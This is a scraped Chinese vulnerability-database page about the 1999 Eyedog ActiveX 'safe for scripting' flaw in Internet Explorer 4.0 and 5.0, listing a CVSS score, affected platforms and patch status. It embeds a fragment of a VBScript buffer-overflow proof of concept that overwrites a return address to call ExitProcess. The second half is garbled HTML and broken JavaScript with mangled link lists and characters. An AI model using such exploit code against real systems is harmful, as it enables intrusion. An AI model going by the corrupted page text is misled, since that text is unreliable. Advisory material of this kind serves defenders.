发布时间 :1999-09-01 00:00:00
修订时间 :2008-09-09 08:35:12

[原文]The Eyedog ActiveX control is marked as "safe for scripting" for Internet Explorer, which allows a remote attacker to execute arbitrary commands as demonstrated by Bubbleboy.

[CNNVD]IE“可安全执行脚本”标记的Eyedog ActiveX授权问题漏洞(CNNVD-199909-004)

        Internet Explorer上带有“可安全执行脚本”标记的Eyedog ActiveX控件存在漏洞。远程攻击者可以执行任意命令,正如Bubbleboy证明的。

- CVSS (基础分值)

CVSS分值: 4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.0Microsoft Internet Explorer 5.0
cpe:/a:microsoft:ie:4.0Microsoft Internet Explorer 4.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

IE“可安全执行脚本”标记的Eyedog ActiveX授权问题漏洞
中危 未知
1999-09-01 00:00:00 2005-10-20 00:00:00
        Internet Explorer上带有“可安全执行脚本”标记的Eyedog ActiveX控件存在漏洞。远程攻击者可以执行任意命令,正如Bubbleboy证明的。

- 公告与补丁


- 漏洞信息 (19487)

MS IE 4.0/5.0 ActiveX "Eyedog" Vulnerability (EDBID:19487)
windows remote
1999-08-21 Verified
0 Shane Hird's
N/A [点击下载]
Microsoft Internet Explorer 4.0/5.0 for Windows 95/Windows NT 4/Windows 2000/Windows 95/Windows 98 ActiveX "Eyedog" Vulnerability


The Eyedog ActiveX control is marked 'safe for scripting' although it permits registry access and other information gathering methods to be used. It also contains a buffer overflow error. These weaknesses can be exploited remotely via a malicious webpage or email.

With this control, MSInfoLoadFile is the offending method. 
There is no easy way to RET to our code, so instead, I have 
shown how to simply RET to ExitProcess directly. This will 
cause the host to terminate.

<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"

<script language="vbscript"><!--

msgbox("EYEDOG OLE Control module Buffer Overrun (Local 
Version)" + Chr(10) + "Written by Shane Hird")

'Padding for the exploit

'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)

'Call exploitable method (MSInfoLoadFile)


- 漏洞信息

Microsoft Eyedog ActiveX Server Side Redirect Arbitrary Command Execution
Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1999-08-21 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete


d主洞式><" va)" /> s="alf 了解更多 本站以及 d>

关于牮题声明> t/h2 (20">源/CWE/义< d/td> 日揸式賨册商架者它们台䕰据源) CNNV< 漏洞f="http://technemeasurordety/"_blank">MS99-03td> 日揸式网站">[原 d>

64criptwb:foa re-" name>


&nbsyle="height:5px"> -o;backg or u-color:# border="0" cellspacing="0" cellpadding="0" class="fbg_resoo

京ICP备14 p>


关于SCAPonstrated by Bth= "><" vas="alf" >

©nt pystyle 074ef="http://www.expom/wb>MS99-0@evan-css . CU: <.> <80ign="top">

i_frialug sr="http://www.securiyouxiagi-bi="t"_blank">MS99-0游侠执行">[li> rli="logo"> i_frialug sr="http://www.securifreebufb>MS99-0FreebuFb> rli="logo"> i_frialug sr=">MS99-0执行功夫li> rli="logo"> i_frialug sr="http://www.sebobyliveb>MS99-0Fittply风物li> rli="logo"> i_frialug sr="http://www.sesebugforce="t"_blank">MS99-0Sebug库(http:li> rli="logo"> i_frialug sr="http://www.securicn-hackforce="t"_blank">MS99-0黑客榜><" li> rli="logo"> i_frialug sr="http://www.securinxad">MS99-0阿德马web执行li> rli="logo"> i_frialug sr="http://www.securiduusub>MS99-0独速li> rli="logo"> i_frialug sr="http://www.seceb2hackfi-bi="t"_blank">MS99-0ceb2hackli> rli="logo"> i_frialug sr="http://www.securidadanfi-bi="t"_blank">MS99-0大胆's BLOGli> rli="logo"> i_frialug sr="http://www.securicnorcty/b>MS99-0adFiSecLabli> rli="logo"> i_frialug sr="http://www.securi91rigi-bet="_blank">MS99-0执行蔻防实骅室li> rli="logo"> i_frialug sr="http://www.securipediyb>MS99-0看雪学院li> rli="logo"> i_frialug sr="http://www.sesec-wik.js"m="t"_blank">> rli="logo"> i_frialug sr="http://www.securicnhackfs"mlner="t"_blank">MS99-0黑客><" vas>[li> rli="logo"> i_frialug sr="http://www.securiidaofengb>MS99-0戀锋执行li> rli="logo"> i_frialug sr=""t"_blank">MS99-0执行凌凌柒li> rli="logo"> i_frialug sr="http://www.securirptcuthojs"m="t"_blank">MS99-0瑞鹏天乘科技li> rli="logo"> i_frialug sr="http://www.securibugty/bi-bi="t"_blank">MS99-0BugSecli> rli="logo"> i_frialug sr="http://www.securi1937cMS99-0国家s>[军日盟li> rli="logo"> i_frialug sr="http://www.securi-cvlove520js"m="t"_blank">MS99-0IT学习s>[li> rli="logo"> i_frialug sr="http://www.seedue.coanMS99-0谷执s>[校li> rli="logo"> i_frialug sr="http://www.securiame=s/1948lner="t"_blank">MS99-0渗透版)li> rli="logo"> i_frialug sr="http://www.securihdhto ex/>MS99-0黑盾科技论坛li> rli="logo"> i_frialug sr="http:/#e="请按照洞微博私 <发邮修懳ge=&kew@g Wi> rtd>

var duoshu_bdhmPl == 'htt (("' : 'h"){ nt.location.protocol == 'h) ? " ' : 'h/-=": " ' : h/-=)ument.getElewulle(une; e("%3C src="stati'th.c_bdhmPl == 'ht+ "'stext/javascript';> %3E")script>